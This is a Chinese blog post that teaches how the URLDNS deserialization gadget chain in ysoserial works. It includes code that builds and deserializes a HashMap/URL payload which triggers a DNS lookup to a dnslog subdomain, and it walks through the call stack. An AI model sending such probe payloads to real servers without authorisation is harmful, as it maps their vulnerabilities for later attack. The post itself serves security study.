[JAVA反序列化初学]URLDNS反序列化链分析

已于 2022-03-07 15:00:28 修改
阅读量4.1k 收藏
点赞数 3
分类专栏: JAVA安全 文章标签: java web安全
于 2022-03-05 12:02:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GX233/article/details/123290257
版权

1. URLDNS链的应用
2. 使用idea和ysoserial来进行调试
3. 分析ysoserial的payload

URLDNS链的应用

URLDNS链只能用来证明反序列化的入口以及判断目标是否可以出网,使用dnslog来判断反序列化漏洞存在,并且目标能够出网。

下面先看洞再看payload。

使用idea和ysoserial来进行调试

在本地布置好ysoserial之后,使用idea打开URLDNS,修改main函数用来调试。
URLDNS

把原本的PayloadRunner.run函数注释掉。

//            PayloadRunner.run(URLDNS.class, args);

添加上序列化和反序列化的代码。把 URLDNS().getObject的参数改成DNSLOG的子域名。

	Object o = new URLDNS().getObject("https://cgxx.tygbw2.dnslog.cn/");
	ByteArrayOutputStream b = new ByteArrayOutputStream();
	ObjectOutputStream oos=new ObjectOutputStream(b);
	oos.writeObject(o);
	byte[] ba = b.toByteArray();
	ByteArrayInputStream BAIS = new ByteArrayInputStream(ba);
	ObjectInputStream OIS = new ObjectInputStream(BAIS);
	OIS.readObject();

在readObject那一行加上断点。
接着跟进readObject中
在这里插入图片描述
进入readObject最后一行PutVal调用的hash(key),需要注意此时key是我们payload中的HashMap的键就是一个URL对象,value是其中的值,url字符串。
在这里插入图片描述
hash函数首先判断key是否为空,key为空返回0,否则对key进行了哈希计算。继续跟入。
在这里插入图片描述
此时发现跟入到了URL类的hashCode,这里嵌套了一下判断了一下对象的hashCode是否为-1,这是为了判断该URL是否解析过。
在这里插入图片描述
该类的hashCode字段初始值就是-1,当该对象的hashCode不是-1,那么就直接返回它的hashCode了,就不会继续计算它的hashCode,所以payload中的hashMap对象需要设置hashCode为-1。
接着来到了到达了发生请求的地方,跟进去,发现有个hashCode函数以URL对象作为形参。可以看到有个getHostAddress应该是要对域名解析IP,传入的参数直接是我们payload中的URL对象。
在这里插入图片描述
跟入该函数,发现getByName函数,并且以对象u的host字段作为参数。
在这里插入图片描述
跟到这里就差不多了,只要在getByName中放入的是域名,就会被请求以获得IP地址,并且放入对象u的hostAddress字段中。接下来对子域名的访问就可以在dnslog上看到了。
dnslog
调用栈如下
调用栈

分析ysoserial的payload

	public Object getObject(final String url) throws Exception {

            //Avoid DNS resolution during payload creation
            //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
            URLStreamHandler handler = new SilentURLStreamHandler();

            HashMap ht = new HashMap(); // HashMap that will contain the URL
            URL u = new URL(null, url, handler); // URL to use as the Key
            ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

            Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.

            return ht;
    }

在payload的第一行代码是使用SilentURLStreamHandler继承了原本的URLStreamHandler并且重写了它的两个方法,看下面原本触发了请求域名IP的函数getHostAddress被重写直接返回null,这样就能避免我们在生成payload的时候触发请求。

static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                        return null;
                }
        }
}

然后,创建一个hashMap,然后实例化一个URL类,将url类的实例放进键中,值放一个字符串即可。最后记得要把对象hashCode改成-1。

最后

十分感谢大佬手把手的教导,大佬真的太强了

Cgxx
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JAVA面试大全之开发基础篇
hao_kkkkk的专栏
03-29 187
全局上理解7层协议,4层,5层的对应关系。OSI依层次结构来划分:应用层(Application)、表示层(Presentation)、会话层(Session)、传输层(Transport)、网络层(Network)、数据路层(Data Link)、物理层(Physical)
Java 反序列化(二) URLDNS链分析
Vicl1fe的博客
03-24 757
前言
反序列化URLDNS
BaiScorpio的博客
06-13 444
通过 URLDNS学习Java反序列化相关的知识。
java反序列化URLDNS链分析
weixin_45682070的博客
11-23 584
readObject()方法 Java反序列化会调用对应的readobject方法 比如我创建一个类test。序列化test类就会调用writeobject方法, 反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法 在HashMap类中,恰恰存在readobject方法 利用: ysoserial项目的利用 * Gadget Chain: * HashMap.readObject() * HashMap.putVal()
URLDNS反序列化
遇事不决冲冲冲
01-28 4027
URLDNS URLDNS算是一条比较简单的利用,这条不依赖第三方库,它无法执行系统命令,成功利用的结果也只是实现服务器的一次url解析,主要用这条判断服务器是否存在反序列化。接下来就这条的原理和poc进行分析。 原理分析 首先了解这一下这条是怎样执行的,代码中最重要的三个类是HashMap,URL,URLStreamHandler。其中HashMap重写了readObject方法,URL类是里面有个hashCode()方法被HashMap的readObject()调用了,URLStreamHa
[JAVA反序列化] URLDNS
snowlyzz的博客
11-08 845
[Java反序列化]—URLDNS 分析
[Java反序列化]—URLDNS
Sentiment的博客
04-14 1243
前言 URLDNS不能执行命令,但通常作为验证是否存在反序列化漏洞的一种方式,学习反序列化应先从URLDNS说起,因为它子短、易理解。 ysoserial 再谈URLDNS前,一定要说的一个工具ysoserial,ysoserial集合了各种java反序列化payload,可以说是Java反序列化的一个里程碑 工具使用 ysoserial 源码 ysoserial.jar ysoserial.jar java -jar ysoserial-[version]-all.jar [payload type]
java url dns_JAVA反序列化URLDNS链分析
weixin_34093899的博客
02-13 279
前言从之前shiro、fastjson等反序列化漏洞刚曝出的时候,就接触ysoserial的工具利用了,不过这么久都没好好去学习过其中的利用,这次先从其中的一个可以说是最简单的利用URLDNS开始学起。分析复制到IDEA中,并导入ysoserial的jar包,当然也可以直接构建生成整个ysoserial项目,然后找到对应的java文件进行调试。先看下整体代码:public class URLD...
告别脚本小子系列丨JAVA安全(6)——反序列化利用(上)
xnxqwzy的博客
09-12 316
我们通常把反序列化漏洞和反序列化利用分开来看,有反序列化漏洞不一定有反序列化利用(经常用shiro反序列化工具的人一定遇到过一种场景就是找到了key,但是找不到gadget,这也就是在这种场景下没有可利用的反序列化利用)。如果我们向某个漏洞提交平台提交一个反序列化漏洞,但是不给反序列化利用,那么平台大概率是不会接受这种漏洞的。反序列化利用是整个反序列化利用过程中最关键的一环,通常反序列化利用需要借助常用的第三方jar包,其中最有名的就是CommonCollections利用(简称CC)。
JAVA上百实例源码以及开源项目源代码
12-11
密钥 Java生成密钥、保存密钥的实例源码,通过本源码可以了解到Java如何产生单钥加密的密钥(myKey)、产生双钥的密钥对(keyPair)、如何保存公钥的字节数组、保存私钥到文件privateKey.dat、如何用Java对象序列化保存...
java字符串转小数
m0_57066056的博客
06-19 1128
什么是 Spring Boot Java (面向对象编程语言)经过30多年的发展,产生了非常多的优秀框架。Spring (为解决企业应用程序开发的复杂性而创建的框架)曾是最受欢迎的Java框架之一, 但随着Node、Ruby、Groovy、PHP等脚本语言的蓬勃发展,使用Spring开发应用就显得繁琐了,因为它使用了大量的XML配置文件,配置繁琐,整合不易,开发和部署效率低下。这时急切需要一-种新的能解决这些问题的快速开发框架,于是Pivotal Software公司在2013开始了Spring Boot的
2022年面试,整理全网初、中、高级常见 Java 面试题
q66562636的博客
07-01 2251
面试题答案见微信小程序 “Java 精选面试题”,3000 + 道面试题。内容持续更新中包含基础、集合、并发、JVM、Spring、Spring MVC、Spring Boot、Spring Cloud、Dubbo、MySQL、Redis、MyBaits、Zookeeper、Linux、数据结构与算法、项目管理工具、消息队列、设计模式、Nginx、常见 BUG 问题、网络编程等。————————————————面向对象编程有哪些特征?一、抽象和封装类和对象体现了抽象和封装抽象就是解释类与对象之间关系的词。类
Java反序列化URLDNS
m0_62466350的博客
05-28 790
URLDNSjava原生态的一条利用,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用,只能发起DNS请求,并不能进行其他利用这条路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
java 反序列化CC1链分析(TransformedMap)
wsitcj的博客
03-14 1444
Map类 --> TransformedMap Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。 TransformedMap.decorate方法
Java反序列化URLDNS
m0_61572518的博客
04-14 2463
序列化代码: import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap; public class UrlDnsClient { public static void main(String[] args)
java url dns_java urldns反序列化
weixin_34475062的博客
02-13 131
java反序列化urldns漏洞触发点在hashmapgadget chainHashMap.readObject() //首先呼叫hashmap的readobject方法HashMap.putVal() //在readObject()内执行了putval函数,putval函数内会计算key的hash,会呼叫hash()方法HashMap.hash() //呼叫hash()方法URL.hashCo...
ClassLoader 反序列化利用
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
01-24 908
文章目录ClassLoader类核心方法1、loadClass:加载java类2、findCLass:查找Java类3、defineClass:定义Java类例子????本地栗子远程栗子回显栗子通过loadClass函数通过defineClass函数 ClassLoader类中loadClass()、findClass()、defineClass()等方法都可以成为利用中的重要一环,特别是在反序列化漏洞中常常被用到。 ClassLoader类核心方法 1、loadClass:加载java类 该方法使用双亲
反序列化之路-URLDNS
最新发布
鸣蜩十四的博客
05-17 769
URLDNS 是ysoserial中一个利用的名字,但准确来说,这个其实不能称作“利用”。因为其参数不是一个可以“利用”的命令,而是一个URL,其能触发的结果也不是命令执行,而是一次DNS请求。但是因为其使用Java内置的类构造,对第三方库没有依赖,并且gadget也简单,适合成为我们初学者刚开始学习反序列化利用的一个很好的开始。
Java 反序列化URLDNS利用 调试分析
wsitcj的博客
03-10 1197
事前准备 他的利用 * Gadget Chain: * HashMap.readObject() * HashMap.putVal() * HashMap.hash() * URL.hashCode() 生成payload: java -jar ysoserial.jar URLDNS http://xxx.ceye.io >out.bin java -jar ysoserial.jar URLDNS http://kjo3
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值